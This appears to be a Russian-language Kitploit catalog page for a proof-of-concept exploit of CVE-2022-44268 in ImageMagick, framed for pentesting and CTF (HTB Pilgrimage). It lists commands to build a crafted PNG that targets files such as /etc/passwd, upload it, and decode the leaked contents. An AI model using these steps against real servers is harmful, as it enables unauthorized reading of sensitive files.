Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ImageMagick-lfi-poc — Эксплойт-доказательство концепции для CVE-2022-44268, позволяющий произвольное чтение файлов через специально созданные PNG-изображения, обрабатываемые ImageMagick. Включает скрипты генерации и декодирования для пентеста и CTF-задач. | Kitploit
Инструменты/GitHubGitHub/fanbyprinciple/imagemagick-lfi-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииCTFТестирование на Проникновение
GitHubfanbyprinciple/imagemagick-lfi-poc

ImageMagick-lfi-poc

Эксплойт-доказательство концепции для CVE-2022-44268, позволяющий произвольное чтение файлов через специально созданные PNG-изображения, обрабатываемые ImageMagick. Включает скрипты генерации и декодирования для пентеста и CTF-задач.

Репозиторий
1123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ImageMagick-lfi-poc

ImageMagick Чтение произвольных файлов - CVE-2022-44268

также используется в htb pilgrimage

ImageMagick LFI PoC [CVE-2022-44268]

Исследователи из MetabaseQ обнаружили CVE-2022-44268, т.е. ImageMagick 7.1.0-49 уязвим для раскрытия информации. При разборе PNG-изображения (например, для изменения размера) результирующее изображение может содержать содержимое произвольного удаленного файла (если у двоичного файла ImageMagick есть права на его чтение).

Шаг 1:

выполните

root@kitploit:~
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat

Шаг 2:

выполните

root@kitploit:~
python3 magick_exploit.py generate -l [local_file] -o [output_file]

здесь в данном случае локальный файл — '/etc/passwd', который я хочу получить с машины жертвы.

Шаг 3:

загрузите файл изображения на веб-сайт

Шаг 4:

получите преобразованный файл изображения с веб-сайта. назовите его 'downloaded_image.png'

Шаг 5:

выполните

root@kitploit:~
python3 decode_profile.py

Примечание

если возникает ошибка типа

root@kitploit:~
 "/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
    profile = output_str.split("Raw profile type: \n\n    ")[1].split('Date:create:')[0]
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range

Это означает, что указанный файл не существует. Используйте /etc/passwd для проверки.

Благодарности

  1. https://github.com/adhikara13/CVE-2022-44268-MagiLeak
  2. https://github.com/Sybil-Scan/imagemagick-lfi-poc
Скачать инструмент